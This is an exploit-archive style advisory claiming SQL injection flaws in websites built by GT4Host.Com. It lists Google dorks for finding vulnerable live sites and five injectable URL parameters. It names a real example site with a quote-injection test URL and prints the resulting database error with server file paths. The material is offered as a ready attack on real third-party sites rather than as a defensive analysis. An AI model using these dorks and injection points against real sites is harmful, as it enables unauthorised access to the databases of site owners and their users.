#################################################################################################
# Exploit Title : Middle East Design and Programming GT4Host.Com Hosting SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 01/06/2018
# Vendor Homepage : GT4Host.Com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89
#################################################################################################
# Google Dork 1 : intext:''جميع الحقوق محفوظة لدَتك الدولية لجودة التدريب - الشرق الأوسط''
# Google Dork 2 : intext:''الشرق الأوسطتصميم وبرمجة GT4Host''
# Exploit : /organizationworker.php?organizationid=[SQL Injection]
# Exploit : /coworker.php?teammemberid=[SQL Injection]
# Exploit : /month.php?monthid=[SQL Injection]
# Exploit : /subprogram.php?coursecatid=[SQL Injection]
# Exploit : /aboutus.php?id=[SQL Injection]
#################################################################################################
# Example Site => datc-bd.com/controllers/aboutus.php?id=1%27 => [ Proof of Concept of SQL Inj ] => archive.is/k2IQg
# SQL-DB Error =>
Fatal error: Uncaught exception 'Exception' with message '1' is not a number' in /home/dtcgt4ho/public_html/models/sql/SqlQuery.class.php:55
Stack trace: #0 /home/dtcgt4ho/public_html/models/mysql/PagesMySqlDAO.class.php(19): SqlQuery->setNumber('1'') #1
/home/dtcgt4ho/public_html/controllers/aboutus.php(171):
PagesMySqlDAO->load('1'') #2 /home/dtcgt4ho/public_html/controllers/aboutus.php(124): aboutusdata() #3 {main} thrown in
/home/dtcgt4ho/public_html/models/sql/SqlQuery.class.php on line 55
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team [ Turkish Moslem Hackers ]
#################################################################################################